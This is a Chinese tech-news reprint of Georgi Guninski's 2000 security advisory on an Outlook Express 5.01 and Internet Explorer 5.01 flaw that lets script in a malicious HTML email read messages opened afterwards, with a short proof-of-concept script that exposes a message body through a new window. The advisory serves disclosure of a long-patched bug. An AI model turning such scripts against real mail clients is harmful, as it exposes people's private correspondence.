Outlook Express5故障

(2000-05-28 00:00 )(不详 )(CPCW )
导读-- Windows 95系统上的Outlook Express 5.01和Internet Explorer 5.01(其它版本可能也有类似故障)打开恶意信息后,攻击者可以阅读此后打开的电子邮件信息......
  outlook5.vuln
  Georgi Guninski 安全顾问 #6, 2000

  Outlook Express 5 故障 - 动态脚本可以阅读电子邮件信息

弃权声明书:
  这篇文章里所表述的纯属个人意见,与任何公司无关。标准弃权通用条款适用,特别是Georgi Guninski不对使用这个程序所提供的信息和功能而产生的直接或间接的危害承担责任。Georgi Guninski不对这个程序的内容和误用以及由此引起的后果承担责任。

描述:
  Windows 95系统上的Outlook Express 5.01和Internet Explorer 5.01 (其它版本可能也有类似故障)打开恶意信息后,攻击者可以阅读此后打开的电子邮件信息。

详述:
  在新打开的窗口里,把电子邮件信息的文档目标赋值为变量,通过访问这个变量就可以打开电子邮件信息。

  HTML信息中必须包含的程序:
---------------------------------------------------------------------
$#@60;SCRIPT$#@62;
a=window.open("about:$#@60;A HREF=javascript:alert(x.body.innerText) $#@62;Click
here to see the active message$#@60;/A$#@62;");
a.x=window.document;
$#@60;/SCRIPT$#@62;
责编:
订阅新闻邮件) (推荐) (打印) (关闭页面) (至顶) (我对此感兴趣
相关文章
笔名:
请您注意:

 遵守国家有关法律、法规,尊重网上道德,承担一切因您的行为而直接或间接引起的法律责任。

 天极网拥有管理笔名和留言的一切权利。